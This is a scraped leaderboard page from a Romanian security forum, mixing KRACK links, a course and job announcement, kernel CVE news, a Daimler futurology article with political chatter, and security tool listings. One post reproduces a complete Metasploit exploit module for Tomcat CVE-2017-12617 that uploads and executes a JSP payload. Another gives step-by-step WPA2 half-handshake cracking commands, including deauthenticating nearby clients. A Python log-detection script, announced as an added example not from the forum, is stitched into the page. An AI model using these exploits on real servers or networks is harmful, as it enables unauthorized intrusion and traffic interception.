
Leaderboard

Popular Content

Showing content with the highest reputation on 10/16/17 in all areas

  1. Paper - https://papers.mathyvanhoef.com/ccs2017.pdf
    5 points
  2. Cyber Security Base with F-Secure is a free course series by the University of Helsinki in collaboration with F-Secure Cyber Security Academy that focuses on building core knowledge and abilities related to the work of a cyber security professional.

     About the Course Series
     The course series consists of multiple smaller courses, each with a specific theme. Themes include a brief introduction to cyber security, operational security, web software development, types of vulnerabilities typical of web software, discovery and mitigation of such vulnerabilities, and advanced topics such as secure software architectures and cryptography. There will be several case studies as well as projects for participants. At the end of the course series, we'll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time frame.

     The course will launch on the 31st of October, 2017. More information at: mooc.fi. The material for last year's course is still available here.

     Leave us your email and we will send you updates about Cyber Security Base with F-Secure.
     https://cybersecuritybase.github.io/
    4 points
  3. Hi,
     We are looking for a Junior Penetration Tester/Ethical Hacker to join our team in Bucharest. If you want to work in a team with 3 RST members (@TheTime, @dancezar and me), send me your CV by PM. For other (non-confidential) details, I'm waiting for your PM. An official (general) profile of the job would be the following:

     Job Brief
     We are looking for a Junior Penetration Tester to join our Penetration Testing team and work in our Lab in Bucharest.

     Responsibilities
     • Identify security vulnerabilities in web applications (e.g. Internet Banking web applications, e-commerce websites, web portals)
     • Conduct internal network penetration testing - simulate a malicious individual (e.g. guest, temporary personnel) who already has access to our client's internal network. Starting only from simple network port access, you should gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags
     • Perform mobile application penetration tests on Android, iOS, or Windows applications
     • Exploit the identified vulnerabilities and identify specific, meaningful risk to clients based on industry and business focus
     • Write comprehensive reports including assessment-based findings, outcomes and recommendations for further security enhancement

     Requirements
     • Experience in identifying and reporting security vulnerabilities
     • Familiarity with web related technologies (Web applications, Web Services) and with network/web related protocols
     • Detailed technical knowledge of at least one of: software security, operating systems security, network security
     • Understanding of the latest security principles, techniques and protocols
     • Should have excellent English written and verbal skills
     • Bachelor's degree in Computer Science or related field
     • Problem solving skills and ability to work under pressure
     • Should be able to work individually or as a member of a team

     Benefits
     • Attractive salary package, including meal tickets and health insurance
     • Work with like-minded, driven and smart team members
     • Encouraged to perform research and participate at security conferences
     • Work flexibility
     • Private, dedicated workspace for security related projects
    3 points
  4. Security researchers have discovered a new privilege-escalation vulnerability in the Linux kernel that could allow a local attacker to execute code on affected systems with elevated privileges.

     Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application. The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace-driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries.

     Successful exploitation of this vulnerability requires an attacker with local access on the targeted system to execute a maliciously crafted application on that system, which allows the attacker to elevate his privileges to root on the targeted system, a Cisco advisory warned.

     The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2; the fix consists simply of taking the refcount properly in "snd_seq_create_port()" and letting the caller unref the object after use.

     Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They are also recommended to allow only trusted users to access local systems and to always monitor affected systems.

     This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS. In February, another privilege-escalation vulnerability that dates back to 2011 was disclosed and patched in the Linux kernel, which also affected major Linux distros, including Redhat, Debian, OpenSUSE, and Ubuntu.

     Via thehackernews.com
    3 points
  5. It's good to dream, but with your head on your shoulders. Who knows what the man smoked... before those things came out of his mouth. If he had that much trust in technology, they wouldn't have set about faking the carbon emissions of millions of cars to fleece many millions of euros. Maybe from his "ivory tower" things look closer to reality, but he never got to live an ordinary life, to see what state a country's infrastructure is in, to see how many people depend on food banks and social aid, what some "people" are capable of doing to others, etc. In other words, to see human misery in its most depraved and hidden corners. As for... Babuinland, many still crap at the back of the yard and drink Mona spirit filtered through bread. Add +500 years to any estimate.
    3 points
  6. The head of Daimler AG predicts the future of the world. In particular, from 2020 the bankruptcy of the car industry will begin
     25.07.2017

     Dieter Zetsche, CEO of Daimler AG, the corporation that owns the Mercedes-Benz brand, expressed his predictions about the future of this world in a blitz interview on the social network LinkedIn. The most astonishing thing we learned from one of his statements is that the car industry will go bankrupt in short order, because nobody will need to buy a car any more!

     [Photo: Dieter Zetsche, CEO of Daimler and Head of Mercedes-Benz, attends a news conference in front of a Mercedes EQ Electric car on media day at the Mondial de l'Automobile, the Paris auto show, in Paris, France, September 29, 2016. REUTERS/Jacky Naegelen]

     Here are all the predictions made by Dieter Zetsche. We'll see whether they come true:

     - Software (systems and programming languages) will destroy traditional industry within 5-10 years; although Uber is a piece of software, it is now the largest taxi company in the world. Likewise, Airbnb is the largest hotel company even though it owns no property;
     [Photo: ztb.kz]
     - On artificial intelligence: this year a computer beat the best player in the world at "Go" (a board game invented in ancient China). It was expected to happen, but only in about 10 years;
     - In the US, young lawyers no longer have jobs. Software such as IBM Watson gives you legal advice in seconds, with 90% accuracy, versus the 70% that people give you;
     - If you are planning to study Law at university, or already are, stop! In the future that is knocking at the door there will be 90% fewer lawyers or legal specialists;
     - The same IBM Watson software currently manages to diagnose cancer four times more accurately than humans, and Facebook has facial recognition software better than what we have natively. By 2030, computers will be superior to humans;
     [Photo: YORKTOWN HEIGHTS, NEW YORK. IBM has created a computer, called Watson, that will play against the best Jeopardy contestants for three nights, Feb. 14, 15, and 16. The host of Jeopardy, Alex Trebek, rehearses for the upcoming show. (Photo by Carolyn Cole/Los Angeles Times via Getty Images)]
     - Autonomous cars: the first such cars, capable of moving without the driver's intervention, will appear from 2018. From 2020 the car manufacturing industry will change and will gradually begin to go bankrupt. You will no longer need a personal car. You and your children will be able to call a car through a mobile app. The car will have no driver; you will just pay and it will take you to your destination. In conclusion: nobody will own cars any more, but we will all have access to them;
     - The above will transform cities, because parking lots will make up only 5% of their surface. 90-95% of the "former" parking lots will become playgrounds;
     - According to statistics, 1.2 million people lose their lives in road accidents every year, one person per 100,000 kilometres. Autonomous cars will save a million lives a year, and the death rate will be one person per 10 million kilometres;
     [Photo: sub5zero.com]
     - A large part of today's traditional car manufacturers will practically cease to exist. Others, such as Tesla, Google and Apple, will revolutionise the car industry by building smart computers on wheels;
     - I currently know a lot of engineers at Volkswagen and Audi who are terrified of Tesla and of what it is capable of;
     - With the arrival of autonomous cars, car insurance will initially become 100 times cheaper, and later this business will disappear completely, because there will be communication between cars, which will prevent road accidents;
     [Photo: bgr.com]
     - Real-estate agencies will disappear too. Nobody will buy a home any more because everyone will live in rented spaces, since it will be possible to work while travelling and so people will always be looking for a nicer place;
     - Cities will be quiet because cars will be electric. Accordingly they will be cleaner and easier to live in. Electricity will get considerably cheaper because access to solar energy will not be limited. Everyone will be able to produce it individually (by buying solar panels, for example);
     - Along with electricity, water will get cheaper too. Desalinating it currently needs 2 kWh and costs 0.25 cents per cubic metre (global average price);
     [Photo: amazonaws.com]
     - Tricorder X will be announced and launched this year, a digital device similar both in name and in function to the one in the Star Trek films. It will analyse the retina, a blood sample and breath through the smartphone. That is how tests will be done, much cheaper, faster and with maximum precision. Accordingly, within a few years a significant part of the medical system (sample collection and interpretation) will disappear;
     - 3D printers will revolutionise the world: in 10 years everyone will be able to afford one, the cheapest good-quality one costing 400 dollars. They will also work 100 times faster. Imagine that at the end of this year phones with a 3D scanning function appear. So you will be able to scan your feet and print out the footwear you want. In China there are already 3D-printed buildings, and some companies produce aircraft parts with a 3D printer. By 2027, 10% of everything produced will be 3D printed;
     - If you currently have business ideas, don't start them unless they work in concert with the smartphone. Also, business ideas that were successful in the 20th century will not be successful in the 21st;
     - 70-80% of today's jobs will disappear in the next 20 years. New ones will appear, but it is not known whether there will be enough;
     - In the future we will have robot farmers at 100 dollars apiece. They will work in our place, and this will revolutionise agriculture, especially in third-world countries (such as those in Africa);
     - Aeroponics, growing plants without soil and practically "in the air", will develop a lot. Alternative products containing more protein than ordinary meat will also be brought to market, made, admittedly, from insects;
     [Photo: A Bosch employee controls a deep field robot called "BoniRob" at a field in Renningen near Stuttgart, Germany July 29, 2016. REUTERS/Michaela Rehle - RTSL1NO]
     - By 2020 there will be apps that detect whether we are lying or trying to deceive someone. Just imagine how that will affect election campaigns, for example;
     - The electronic currency, bitcoin, could become an international currency!
     - By 2036 we should live to 100 years on average. From now on, every year the average lifespan grows by 3 months;
     - In 2020, 70% of people will have a smartphone, and thus access to quality education. In Africa and Asia phones are already being sold at 10 dollars apiece. In the future all the children in the world will have access to higher education, practically for free.
     [Photo: psm7.com]

     Source: http://autoblog.md/seful-daimler-ag-prezice-viitorul-lumii-particular-din-2020-va-incepe-falimentul-industriei-auto/

     Maybe it's from too much coffee, but the article got me thinking.
    2 points
  7. 2 points
  8. I think that, in theory, if AI were to develop enough, many IT positions could be replaced. At first there will be AI doing the "grunt work", and we'll only rack our brains over higher-level concepts (until the AI gets there too, and then repeat). Still, maybe (I hope) there will be positive changes overall; maybe it will get people out of the "rat race" and people will have time to be more human and less modern slaves, which might also improve relations between people. There are many people who don't do anything they like at all, because they spend almost all their time on a job that only helps them survive, and this contributes to many negative things. But a possible downside is that if you have technology that does almost everything for you as a human, many will no longer exercise their cognitive abilities much, leading to a drop in intelligence (we reached this level of intelligence as humans precisely by solving the problems we encountered); in other words, the world will get even dumber, which will be a point to exploit for some. Of course, TV and the internet used only for entertainment already do this to many people, but I hope their number won't grow too much in the future.
    2 points
  9. And in the media...
     http://www.independent.co.uk/life-style/gadgets-and-tech/news/krack-wifi-wpa-2-free-network-internet-device-android-ios-iphone-phone-safety-privacy-security-a8002731.html
     https://www.theregister.co.uk/2017/10/16/wpa2_krack_attack_security_wifi_wireless/
     https://www.theguardian.com/technology/2017/oct/16/wpa2-wifi-security-vulnerable-hacking-us-government-warns
     https://www.forbes.com/sites/thomasbrewster/2017/10/16/krack-attack-breaks-wifi-encryption/
     http://www.zdnet.com/article/wpa2-security-flaw-lets-hackers-attack-almost-any-wifi-device/
     https://mspoweruser.com/krack-attack-makes-trivial-intercept-manipulate-traffic-sent-linux-android-devices/
     http://www.bbc.co.uk/news/technology-41635516
     https://arstechnica.com/information-technology/2017/10/severe-flaw-in-wpa2-protocol-leaves-wi-fi-traffic-open-to-eavesdropping/
    2 points
  10. The future is going to be interesting; let's hope for the better. Anyway, PSD Romania will still be in the Middle Ages, so let's not have great expectations. It's important to understand that at least we, those who work in "IT", are not going to be left without jobs.
    2 points
  11. The Worldpay Payments & IoT Hackathon is taking place this November 3-5 in Bucharest at the Impact Hub. Participants will receive training on IoT and Worldpay technologies! I can't forget to mention the prize pool worth 13,500 Lei that will be awarded among the winning teams! Here is the media kit
    2 points
  12. You underestimate the survival instinct of bacteria/parasites. They always find a host to latch onto and on whose back to multiply. But they too are somewhat necessary for the evolution of the species (except for some who swarm around here on the forum)
    1 point
  13. The Club of Rome published in 1991: "In searching for a common enemy against whom we can unite, we came up with the idea that pollution, the threat of global warming, water shortages, famine and the like, would fit the bill. In their totality and their interactions these phenomena do constitute a common threat which must be confronted by everyone together. But in designating these dangers as the enemy, we fall into the trap, which we have already warned readers about, namely mistaking symptoms for causes. All these dangers are caused by human intervention in natural processes, and it is only through changed attitudes and behaviour that they can be overcome. The real enemy then is humanity itself." It took up older theses; the head of Daimler AG repackages the same obsessions "commercially", just enough to make the decision that will be imposed on us digestible. We are in their way; we are too numerous, useless and dangerous for them.
    1 point
  14. Vulnerability Note VU#228519: Wi-Fi Protected Access II (WPA2) handshake traffic can be manipulated to induce nonce and session key reuse.
      Vendor Information for VU#228519.
    1 point
  15. There are other RST members too, they just stay "underground".
    1 point
  16. It reminded me of Ceaușescu-era propaganda too
    1 point
  17. I read something of the sort today as well, but from Elon Musca. I'm not so enthusiastic about what this future they foresee can bring us.
    1 point
  18. And some figures.. (if they're true).. before robot farmers, drone-cars and 3D printers:
      http://www.digi24.ro/stiri/actualitate/social/10-milioane-de-romani-fara-canalizare-cand-vrem-sa-facem-baie-plecam-la-oras-763765
      http://www.gandul.info/stiri/jumatate-din-populatia-romaniei-nu-are-canalizare-sau-acces-la-retele-de-epurare-a-apelor-statistici-ins-16594028
    1 point
  19. @QuoVadis you reminded me of this gem
    1 point
  20. 1 point
  21. This Metasploit module uploads a jsp payload and executes it.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'         => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
        ],
      'Privileged'     => false,
      'Platform'       => %w{ linux win }, # others?
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Linux', { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
      Opt::RPORT(8080)
    ])
  end

  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)
    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => "<% out.println(\"#{testcontent}\");%>"
    })
    res1 = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method' => 'GET'
    })
    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        opts = {
          'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
          'method' => 'DELETE'
        },
        timeout = 1
      )
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method' => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end
end

# 0day.today [2017-10-13]
# Source: 0day.today
    1 point
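The module above drives Tomcat's PUT handler with a path ending in ".jsp/" and then fetches the same name without the slash, so the whole chain leaves a very recognisable trace in the Tomcat access log. The following is an added example, not code from the module, from 0day.today or from the Metasploit project: a small Python scanner over constructed common-log-format lines (the client addresses, paths and timestamps are made up) that flags PUT or DELETE requests to a ".jsp/" path, a later GET of the uploaded name from the same client, any PUT of a .jsp resource, and any accepted PUT at all, since a server that answers PUT with 201 is the precondition for the whole chain.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed Tomcat access-log lines (common log format), not real traffic.
# The first three lines mirror the module's sequence: PUT to "<name>.jsp/",
# GET of "<name>.jsp", then DELETE of "<name>.jsp/".
SAMPLE_LOG = """\
192.0.2.10 - - [16/Oct/2017:10:00:01 +0000] "PUT /abcdefghij.jsp/ HTTP/1.1" 201 -
192.0.2.10 - - [16/Oct/2017:10:00:02 +0000] "GET /abcdefghij.jsp HTTP/1.1" 200 12
192.0.2.10 - - [16/Oct/2017:10:00:03 +0000] "DELETE /abcdefghij.jsp/ HTTP/1.1" 204 -
198.51.100.5 - - [16/Oct/2017:10:05:00 +0000] "GET /index.jsp HTTP/1.1" 200 1234
198.51.100.5 - - [16/Oct/2017:10:05:01 +0000] "PUT /upload/report.txt HTTP/1.1" 201 -
203.0.113.7 - - [16/Oct/2017:10:06:00 +0000] "PUT /shell.jsp HTTP/1.1" 403 -
"""

# Common log format: client, ident, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def _clean_path(path: str) -> str:
    # Drop any query string and normalise case before pattern matching
    return path.split('?', 1)[0].lower()


def scan(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request, in log order."""
    findings: List[Dict[str, str]] = []
    # (client ip, uploaded path without the trailing slash) for successful bypass PUTs
    uploaded: Set[Tuple[str, str]] = set()
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        ip, method, status = entry['ip'], entry['method'], entry['status']
        path = _clean_path(entry['path'])
        finding: Optional[Tuple[str, str]] = None
        if method in ('PUT', 'DELETE') and path.endswith('.jsp/'):
            # The trailing slash is the CVE-2017-12617 bypass pattern itself
            finding = ('high', f'{method} to a .jsp path with trailing slash (CVE-2017-12617 pattern)')
            if method == 'PUT' and status == '201':
                uploaded.add((ip, path[:-1]))
        elif method == 'PUT' and path.endswith('.jsp'):
            # Even a rejected PUT of a JSP is worth a look
            finding = ('medium', f'PUT of a .jsp resource (status {status})')
        elif method == 'GET' and (ip, path) in uploaded:
            # Same client fetching what it just uploaded: the execution step
            finding = ('high', 'request for a JSP previously uploaded via the bypass (likely execution)')
        elif method == 'PUT' and status == '201':
            # PUT being accepted at all is the precondition for the attack
            finding = ('low', 'HTTP PUT accepted by the server (write access enabled)')
        if finding:
            findings.append({
                'ip': ip, 'ts': entry['ts'], 'method': method, 'path': path,
                'status': status, 'severity': finding[0], 'reason': finding[1],
            })
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']:6}] {f['ip']} {f['method']} {f['path']} -> {f['reason']}")
```

Feed scan() the contents of a real access log to use it; LOG_RE only understands the textbook common log format, so a pattern with extra fields (referrer, user agent, a virtual host column) needs the regex extended accordingly.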
  22. Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)
    1 point
  23. Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/
    1 point
  24. Your Computer’s Hard Drive Can Be Used to Listen to What You’re Saying Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80
    1 point
  25. OS X Auditor is a free Mac OS X computer forensics tool.

      OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
      - the kernel extensions
      - the system agents and daemons
      - the third party's agents and daemons
      - the old and deprecated system and third party's startup items
      - the users' agents
      - the users' downloaded files
      - the installed applications

      It extracts:
      - the users' quarantined files
      - the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
      - the users' Firefox cookies, downloads, formhistory, permissions, places and signons
      - the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
      - the users' social and email accounts
      - the WiFi access points the audited system has been connected to (and tries to geolocate them)

      It also looks for suspicious keywords in the .plist themselves.

      It can verify the reputation of each file on:
      - Team Cymru's MHR
      - VirusTotal
      - your own local database

      It can aggregate all logs from the following directories into a zipball:
      - /var/log (-> /private/var/log)
      - /Library/logs
      - the user's ~/Library/logs

      Finally, the results can be:
      - rendered as a simple txt log file (so you can cat-pipe-grep in them... or just grep)
      - rendered as a HTML log file
      - sent to a Syslog server

      Author
      Jean-Philippe Teissier - @Jipe_ & al.

      Support
      OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector)

      How to install
      Just copy all files from GitHub.

      Dependencies
      If you plan to run OS X Auditor on a Mac, you will get full plist parsing support with the OS X Foundation through pyobjc:
        pip install pyobjc
      If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some trouble with the plist parsing:
        pip install biplist
        pip install plist
      These dependencies will be removed when a working native plist module is available in python.

      How to run
      OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare).
      OS X Auditor is maintained to work on the latest OS X version. It will do its best on older OS X versions.
      You must run it as root (or via sudo) if you want to use it on a running system, otherwise it won't be able to access some system and other users' files.
      If you're using API keys from environment variables (see below), you need to use sudo -E to use the user's environment variables.
      Type osxauditor.py -h to get all the available options, then run it with the selected options, e.g.:
        [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

      Setting Environment Variables
      VirusTotal API: export VT_API_KEY=aaaabbbbccccddddeeee

      Changelog

      Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git
      Source: https://github.com/jipegit/OSXAuditor
    1 point
  26. Hacking Soft Tokens: Advanced Reverse Engineering on Android
      Bernhard Mueller, © 2016 Vantage Point Security Pte. Ltd.

      Table of Contents
      - Introduction
      - Mobile One-Time Password Token Overview
        - OATH TOTP
        - Proprietary Algorithms
        - Provisioning
        - Attacks
          - Retrieval from Memory
          - Code Lifting and Instrumentation
      - The Android Reverser's Toolbox
        - De-Compilers, Disassemblers and Debuggers
        - Tracing Java Code
        - Tracing Native Code
        - Tracing System Calls
        - Classic Linux Rootkit Style
        - Dynamic Analysis Frameworks
        - Drawbacks Emulation-based Analysis
        - Runtime Instrumentation with Frida
      - Building A Sandbox
        - Sandbox Overview
        - Customizing the Kernel
        - Customizing the RAMDisk
        - Booting the Environment
        - Customizing ART
        - Hooking System Calls
        - Automating System Call Hooking with Zork
      - Case Studies
        - RSA SecurID: ProGuard and a Proprietary Algorithm
          - Analyzing ProGuard-processed Bytecode
          - Data Storage and Runtime Encryption
          - Tool Time: RSACloneId
          - Vendor Response
          - Summary
        - Vasco DIGIPASS: Advanced Anti-Tampering
          - Initial Analysis
          - Root Detection and Integrity Checks
          - Native Debugging Defenses
          - JDWP Debugging Defenses
          - Static-dynamic Analysis
          - Attack Outline
          - Tool Time: VasClone
          - Vendor Comments
          - Summary
      - TL;DR
        - Attack Mitigation
        - Software Protection Effectiveness
      - References

      Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf
    1 point
  27. WPA2-HalfHandshake-Crack

      Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. For more information on general wifi hacking, see here

      Install
        $ sudo python setup.py install

      Sample use
        $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
      -r Where to read input pcap file with half handshake (works with full handshakes too)
      -m AP mac address (From the 'fake' access point that was used during the capture)
      -s AP SSID
      -d (optional) Where to read dictionary from

      Capturing half handshakes
      To listen for device probes the aircrack suite can be used as follows
        sudo airmon-ng start wlan0
        sudo airodump-ng mon0
      You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted.
      Set up a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything. In Ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/
      Capture traffic on this interface. In Linux this can be achieved with tcpdump
        sudo tcpdump -i wlan0 -s 65535 -w file.cap
      (optional) Deauthenticate clients from nearby WiFi networks to increase probes
      If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication

      Source: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
    1 point
  28. What amuses me most are the comments of some people who, in my opinion, are either too old and communism hasn't left them, or too narrow-minded. Guys, the future isn't limited to Romania's borders, cut the crap with that shitty mentality. You think the world won't evolve because of the Romanians who crap at the back of the yard?! You're mistaken!
    -2 points